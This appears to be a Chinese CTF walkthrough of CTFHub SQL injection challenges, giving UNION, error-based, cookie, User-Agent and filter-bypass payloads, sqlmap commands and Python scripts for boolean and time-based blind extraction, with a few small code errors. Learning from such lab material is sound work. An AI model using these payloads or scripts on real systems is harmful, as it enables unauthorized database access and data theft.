整数型注入
[huayang]Flag&基本步骤—通用任何数字(整数)型注入
方法一:硬爆,手撸
1.检查是否存在注入
1 and 1=1 返回正确
1 and 1=2 返回错误
2.猜出字段数
order by x(数字)
order by 语句用于根据指定的列对结果集进行排序
这里我们一个一个的试
由此我们猜出有两列
3.然后就是爆数据库名
1 and 1=2 union select 1,database()
得到数据库名称sqli
4.爆表名
1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema=’sqli’
得到表名 news,flag
5.爆字段名
1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=’flag’
得到字段名flag
6.爆flag
1 and 1=2 union select 1,group_concat(flag) from sqli.flag
得到ctfhub{7f95c9e82c76993d6695e97631bf80b646c2fd5c}
这部分知识点一并放在sql注入详细讲解
方法二 脚本-sqlmap
注:sqlmap为python2下的代码
1.查库名
python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 --dbs
2.查表名
python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli –tables
3.查字段
python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli -T --columns
4.查数据
python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump
sqlmap用法及步骤
sqlmap -u [“url”] --dbs #获取数据库 sqlmap -u [“url”] --current-user #获取当前用户名称 : sqlmap -u [“url”] --current-db #获取当前数据库名称 sqlmap -u [“url”] -D [‘数据库名’] --tables #列出表名 : sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns #列出字段 sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump #获取字段内容
sqlmap其他知识点会在sqlmap实战中仔细讲解
字符型注入
Flag
1.查数据库
2.查表名
112' union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli'#
3.查字段名
1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag
4.查字段内容
123' union select flag,2 from flag#
总体来说差别还是在于引号的闭合
SQL 报错注入
Flag
1.查库
1 Union select count(*),concat((select database()),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
2.查表
1 Union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
可以猜到这并不是我们想要得信息
继续
1 Union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
3.查字段
1 Union select count(*),concat((select column_name from information_schema.columns where table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
4.查字段信息
1 Union select count(*),concat((select flag from sqli.flag),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
布尔盲注
直接给脚本
import requests
urls = 'http://challenge-cbd41590d122d86c.sandbox.ctfhub.com:10080/?id='
true = 'query_success'
def database_name():
name = ''
for number in range(1,8):
for letter in 'qwertyuioplkjhgfdsazxcvb':
url = urls + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
number, letter)
response = requests.get(url)
if true in response.text:
name = name + letter
print(name,'...')
break
print('\n>>>database_name=',name,'<<<\n')
database_name()
def table_name():
list = []
for number1 in range(3):
name = ''
for number2 in range(1,8):
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
number1, number2, letter)
response = requests.get(url)
if true in response.text:
name = name + letter
print(name,'...')
break
list.append(name)
print('\n>>>table_name=', list,'<<<\n')
table_name()
def column_name():
list = []
for number1 in range(3):
name = ''
for number2 in range(1,8):
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
number1, number2, letter)
response = requests.get(url)
if true in response.text:
name = name + letter
print(name,'...')
break
list.append(name)
print('\n>>>column_name=', list,'<<<\n')
column_name()
def get_flag():
name = ''
for number1 in range(50):
for number2 in range(48, 126):
url = urls + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (
number1, number2)
response = requests.get(url)
if true in response.text:
name = name + chr(number2)
print(name,'...')
break
print('\n>>>flag=', name,'<<<\n')
get_flag()
时间盲注
Flag
详细的方式放在专题说
直接上代码
import requests,time
urls = 'http://challenge-b8d41d0852a2709a.sandbox.ctfhub.com:10080/?id='
def database_name():
naem = ''
for number in range(8):
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr(database(),%d,1)="%s",sleep(1),1)' % (number,letter)
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current > 1:
name = name + letter
print(name)
break
print(name)
database_name()
def table_name():
array = []
for number1 in range(4):
name = ''
for number2 in range(8):
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select table_name from information_schema.tables where table_schema="sqli" limit %d,1),%d,1) = "%s",sleep(1),1)' % (number1,number2,letter)
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current > 1:
name = name + letter
print(name)
break
array.append(name)
print(array)
table_name()
def column_name():
name = ''
for number2 in range(8):
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema="sqli"),%d,1) = "%s",sleep(1),1)' % (number2,letter)
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current > 1:
name = name + letter
print(name)
break
print(name)
column_name()
def flag():
name = ''
for number1 in range(1,50):
for number2 in range(48,126):
url = urls + 'if(substr((select flag from sqli.flag),%d,1) = "%s",sleep(1),1)' % (number1,chr(number2))
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current >= 1:
name = name + chr(number2)
print(name)
break
print(name)
database_name()
table_name()
column_name()
flag()
记得改成小写
MySQL结构
Flag
暂时手工不是很会,直接sqlmap一梭子
需要注意的是flag在这个表里
另一个打出来只能看见这个信息
这是字段信息哦
Cookie注入
手法不变只不过是吧注入页面换成了抓包工具
Flag
手撸
我们先输入个1看看效果
嗯,我想大家应该会了
1.查库
1+and+1=2+union+select+database(),2#
2.查表
1+and+1=2+union+select+group_concat(table_name),2+from +information_schema.tables+where+table_schema='sqli'#
3.查字段
1+and+1=2+union+select+group_concat(column_name),2+from +information_schema.columns+where+table_name='sjezkujtwr'#
4.查字段信息
1+and+1=2+union+select+cinmtrnyyz,2+from+sqli.sjezkujtwr#
cookie注入使用脚本和前面的不一样这里说一下
脚本sqlmap
1.库名
python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" --dbs
2.表名
python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli --tables
经过上面那些,猜都知道flag在sjezkujtwr里
3.字段
python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli -T sjezkujtwr --columns
4.字段信息
python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli -T sjezkujtwr -C cinmtrnyyz --dump
UA注入
Flag
手撸
这个注入和前面的也一样只不过是换到了ua里
就这个意思
1.库
1 and 1=2 union select database(),2#
2.表
1 and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli'#
3.字段
1 and 1=2 union select group_concat(column_name),2 from
information_schema.columns where+table_name='vukfimjwtg'#
4.字段信息
1 and 1=2 union select lgbnyifysd,2 from sqli.vukfimjwtg#
python代码
待写。。。
过滤空格
Flag
手撸
整体来说也是万变不离其中加个注释又是一样
1.库
1/**/and/**/1=2/**/union/**/select/**/database(),2#
2.表
1/**/and/**/1=2/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'
3.字段
1/**/and/**/1=2/**/union/**/select/**/group_concat(column_name),2/**/from/**/information_schema.columns/**/where/**/table_name='jdyrbbxovi'
4.字段信息
1/**/and/**/1=2/**/union/**/select/**/sfuqqyytbz,2/**/from/**/sqli.jdyrbbxovi
脚本——sqlmap
待写
Refer注入
Flag
手撸
代码和ua的都一样就不写了
1.表
2.字段
3.字段信息
完!
随后更加详细的分析都将会在sql注入(入门篇)里更加仔细的讲解
【原创 精华 超详细】SQL注入总结——(入门篇,ctf篇)
伸手党,白嫖党勿进!!!
[/huayang]
FROM:浅浅淡淡[hellohy]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论